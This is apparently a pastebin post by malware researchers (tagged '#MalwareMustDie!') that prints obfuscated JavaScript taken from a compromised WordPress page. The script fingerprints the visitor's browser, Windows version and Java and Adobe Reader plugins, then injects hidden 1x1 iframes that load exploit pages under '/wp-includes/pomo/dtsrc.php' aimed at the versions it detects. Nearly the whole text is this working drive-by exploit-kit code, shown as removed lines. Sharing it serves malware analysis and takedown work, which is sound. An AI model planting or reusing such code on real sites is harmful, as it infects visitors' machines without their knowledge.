- if ((typeof znQAdpi) == "object" && (typeof IGwyvnqihKC) == "object") {
- return "2010";
- } else if ((typeof znQAdpi) == "number" && (typeof IGwyvnqihKC) == "object") {
- return "2007";
- }
- return null;
- }
- function KzRIuDdJ(QEzGR) {
- if (QEzGR != null) {
- if (QEzGR[0] == 1 && QEzGR[1] == 7 && QEzGR[3] <= 17) {
- vZfpbBKzh();
- }
- }
- }
- function YnuLXRygeP() {
- PXTLS('/wp-includes/pomo/dtsrc.php?a=h4', 'text/html');
- }
- function UIlKdBdnO() {
- if (CzdxtSXz.indexOf('msie') != -1 && CzdxtSXz.indexOf('opera') == -1 && CzdxtSXz.indexOf('webtv') == -1) {
- return 'msie'
- }
- if (CzdxtSXz.indexOf('opera') != -1) {
- return 'opera'
- }
- if (CzdxtSXz.indexOf('firefox') != -1) {
- return 'firefox';
- }
- return null;
- }
- function pMuJUQa() {
- return PcyjjcB("Java");
- }
- function VcXjat() {
- return;
- }
- function PXTLS(bVVpcDYN, UgfEmMfy) {
- try {
- var sevqAkcRBI = document.createElement('iframe');
- sevqAkcRBI.style.visibility = 'hidden';
- sevqAkcRBI.height = 1;
- sevqAkcRBI.src = bVVpcDYN;
- sevqAkcRBI.async = true;
- sevqAkcRBI.width = 1;
- sevqAkcRBI.type = UgfEmMfy;
- document.body.appendChild(sevqAkcRBI);
- } catch (BeerBZu) {
- return null;
- }
- }
- function TQGRXSEi() {
- PXTLS('/wp-includes/pomo/dtsrc.php?a=h7', 'text/html');
- }
- function xAtqjEshx() {
- var NVDGXp = fPVoBak();
- var hapkhUyCQ = UIlKdBdnO();
- var ZooVPohAB = KKYaG(); /*var pUcLru = PPnprFkcx();*/
- var uwRBqOEcl = zzaRNJ();
- if (hapkhUyCQ == 'msie' && NVDGXp == 7 && ZooVPohAB < 6) {
- nekTVLCFu();
- var QEzGR = pMuJUQa();
- if (QEzGR != null) {
- setTimeout(function () {
- ipzPNmQxc(QEzGR);
- }, 3000);
- }
- return;
- }
- if (hapkhUyCQ == 'msie' && NVDGXp == 8 && ZooVPohAB < 6) {
- YQnBLMyY();
- var QEzGR = pMuJUQa();
- if (QEzGR != null) {
- setTimeout(function () {
- ipzPNmQxc(QEzGR);
- }, 3000);
- }
- return;
- }
- if (hapkhUyCQ == 'msie' && NVDGXp == 6 && ZooVPohAB < 6) {
- YnuLXRygeP();
- var QEzGR = pMuJUQa();
- if (QEzGR != null) {
- setTimeout(function () {
- ipzPNmQxc(QEzGR);
- }, 3000);
- }
- return;
- }
- var QEzGR = pMuJUQa();
- if (QEzGR != null && ZooVPohAB != null) {
- if (hapkhUyCQ == 'chrome') {
- KzRIuDdJ(QEzGR);
- } else {
- ipzPNmQxc(QEzGR);
- }
- }
- }
- function ekUwwyBtM() {
- return PcyjjcB("AdobeReader");
- }
- function YjGGR() {
- return;
- }
- function KKYaG() {
- try {
- return parseFloat(CzdxtSXz.match(/windows nt ([\d]+)\.[\d]+/)[1]);
- } catch (BeerBZu) {
- return null;
- }
- }
- function zzaRNJ() {
- if (CzdxtSXz.indexOf('wow64') != -1) {
- return '64';
- } else {
- return '32';
- }
- }
- var CzdxtSXz = navigator.userAgent.toLowerCase();
- xAtqjEshx();
- </script>
- </body>
- </html>
- -----
- #MalwareMustDie!
Add Comment
Please, Sign In to add comment